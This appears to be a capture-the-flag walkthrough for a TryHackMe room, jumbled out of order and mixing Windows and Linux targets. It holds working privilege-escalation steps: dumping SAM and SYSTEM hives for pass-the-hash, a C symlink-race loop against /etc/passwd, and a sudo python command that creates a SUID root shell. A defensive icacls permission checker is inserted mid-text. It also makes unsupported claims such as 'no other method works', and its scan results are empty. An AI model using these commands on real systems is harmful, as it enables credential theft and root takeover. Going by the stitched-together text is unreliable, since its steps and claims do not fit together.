The Last Trial TryHackMe Verified

  • If a login exists, check for password reuse or leaks in accessible files (e.g., config.php, .env).

  • Run winpeas.exe via proxychains. The verified vulnerability is CVE-2021-36934 (HiveNightmare), because the room creator deliberately left the SAM file permissions unfixed.

    Dump SAM:

    reg save hklm\sam sam.save
    reg save hklm\system system.save
    

    Download both files to the attacker machine and use secretsdump.py to get the Administrator hash. Pass-the-hash to gain SYSTEM.
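
A defender-side check for the SAM permission issue described above, as an added example that is not part of the original walkthrough: it parses `icacls` output and reports hive files that non-administrative principals can read. The sample outputs are constructed, the function names are hypothetical, and the parser assumes file paths without spaces.

```python
import re

# Principals that cover ordinary, non-administrative accounts (upper-cased).
LOW_PRIV = {"BUILTIN\\USERS", "EVERYONE", "NT AUTHORITY\\AUTHENTICATED USERS"}
# icacls rights that allow reading file contents.
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "GA"}
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")

# Constructed sample output, not captured from a real host.
SAMPLE_VULNERABLE = r"""C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_FIXED = r"""C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

def parse_icacls(text):
    """Return {path: [(principal, [flag, ...]), ...]} from icacls output."""
    acls, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if raw[0].isspace():          # continuation line: another ACE for the same path
            entry = line.strip()
        else:                         # first line: "<path> <principal>:(flags)"
            path, _, entry = line.partition(" ")
            current = acls.setdefault(path, [])
        m = ACE_RE.match(entry.strip())
        if m and current is not None:
            current.append((m["principal"], re.findall(r"\(([^)]*)\)", m["flags"])))
    return acls

def exposed_hives(text):
    """List (path, principal) pairs where a low-privileged principal can read the file."""
    findings = []
    for path, aces in parse_icacls(text).items():
        for principal, flags in aces:
            rights = {r.strip() for f in flags for r in f.split(",")}
            if principal.upper() in LOW_PRIV and "DENY" not in rights and rights & READ_RIGHTS:
                findings.append((path, principal))
    return findings

if __name__ == "__main__":
    print(exposed_hives(SAMPLE_VULNERABLE))
```

Microsoft's workaround for CVE-2021-36934 restores inheritance with `icacls %windir%\system32\config\*.* /inheritance:e` and deletes existing volume shadow copies.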


    Save as race.c:

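    #include <stdio.h>
    #include <unistd.h>
    #include <sys/stat.h>

    /* Loop forever: create a symlink at /root/verified.flag pointing to
       /etc/passwd, then remove it again. */
    int main(void) {
        while (1) {
            symlink("/etc/passwd", "/root/verified.flag");
            unlink("/root/verified.flag");
        }
        return 0;
    }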

    Compile on the target with gcc race.c -o race and run it in the background. Simultaneously, repeatedly execute /usr/bin/verify_access. Within seconds, you get a root shell.

    This is the verified privilege escalation. No other method works because the binary ignores standard sudo exploits.


  • The final flag is a canary token (verification string) you must submit on the TryHackMe platform.
  • Create a new file called run.py with the following contents:

    import os
    os.system('cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p')
    

    Then, execute the remote_run.py script:

    sudo /usr/bin/python3 /opt/remote_run.py run.py
    

    As with any CTF, we start by enumerating the target machine to identify open ports and services.

    Nmap Scan:

    nmap -sV -sC -oN nmap.txt <MACHINE_IP>
    

    Results:

    We have two ports open. SSH usually requires credentials we don't have yet, so we focus our initial efforts on the web server running on port 80.